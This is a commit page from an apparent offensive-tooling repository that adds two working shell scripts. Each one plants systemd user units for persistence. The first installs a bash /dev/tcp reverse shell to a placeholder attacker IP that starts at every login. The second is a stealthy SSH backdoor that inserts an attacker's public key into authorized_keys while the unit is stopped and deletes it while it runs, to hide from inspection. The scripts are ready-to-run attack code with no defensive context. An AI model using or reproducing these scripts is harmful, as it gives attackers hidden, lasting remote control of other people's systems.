Skip to content

Commit 23d4717

Browse files
jivoijivoi
committed
systemd_hack
1 parent 60be208 commit 23d4717

File tree

2 files changed

+60
-0
lines changed

2 files changed

+60
-0
lines changed

shell/systemd_bash_rshell.sh

+30
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
#!/bin/sh
2+
# systemd bash /dev/tcp reverse shell on login
3+
4+
IP="attacker_ip"
5+
PORT="443"
6+
SYSTEMD_PATH="/usr/lib/systemd/user/ $HOME/.local/share/systemd/user/ /etc/systemd/user/ $HOME/.config/systemd/user/ $XDG_RUNTIME_DIR/systemd/user/"
7+
W_PATH=""
8+
UNIT="rshell.service"
9+
UNIT_CONTENT="[Unit]
10+
Description=Y are pwned
11+
12+
[Service]
13+
RemainAfterExit=yes
14+
Type=simple
15+
ExecStart=/bin/bash -c \"exec 5<>/dev/tcp/$IP/$PORT; cat <&5 | while read line; do \$line 2>&5 >&5; done\"
16+
17+
[Install]
18+
WantedBy=default.target"
19+
for i in $SYSTEMD_PATH; do
20+
mkdir -p "$i"
21+
if [ -w "$i" ]; then W_PATH="${i%/} $W_PATH"; fi
22+
done
23+
24+
for k in $W_PATH; do
25+
echo "$UNIT_CONTENT" > "$k/$UNIT"
26+
echo "[*] created rshell in '$k/$UNIT"
27+
done
28+
systemctl --user daemon-reload
29+
systemctl --user restart $UNIT > /dev/null
30+
systemctl --user enable $UNIT

shell/systemd_sshkey_shell.sh

+30
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
#!/bin/sh
2+
# systemd authorized_keys backdoor + "stealth"
3+
4+
KEYS="ssh-ed25519 insert_y_ssh_pub_key"
5+
SYSTEMD_PATH="/usr/lib/systemd/user/ $HOME/.local/share/systemd/user/ /etc/systemd/user/ $HOME/.config/systemd/user/ $XDG_RUNTIME_DIR/systemd/user/"
6+
W_PATH=""
7+
UNIT="rshell.service"
8+
UNIT_CONTENT="[Unit]
9+
description=Y are pwned
10+
11+
[Service]
12+
RemainAfterExit=yes
13+
Type=simple
14+
ExecStop=/bin/bash -c 'mkdir -p \$HOME/.ssh && touch \$HOME/.ssh/authorized_keys; [ \"\$(grep \"$KEYS\" \$HOME/.ssh/authorized_keys)\" ] || echo \"$KEYS\" >> \$HOME/.ssh/authorized_keys'
15+
ExecStart=/bin/bash -c 'sed -i \'/$KEYS/d\' \$HOME/.ssh/authorized_keys'
16+
17+
[Install]
18+
WantedBy=default.target"
19+
for i in $SYSTEMD_PATH; do
20+
mkdir -p "$i"
21+
if [ -w "$i" ]; then W_PATH="${i%/} $W_PATH"; fi
22+
done
23+
24+
for k in $W_PATH; do
25+
echo "$UNIT_CONTENT" > "$k/$UNIT"
26+
echo "[*] created shell in '$k/$UNIT'"
27+
done
28+
systemctl --user daemon-reload
29+
systemctl --user start $UNIT > /dev/null
30+
systemctl --user enable $UNIT

0 commit comments

Comments
 (0)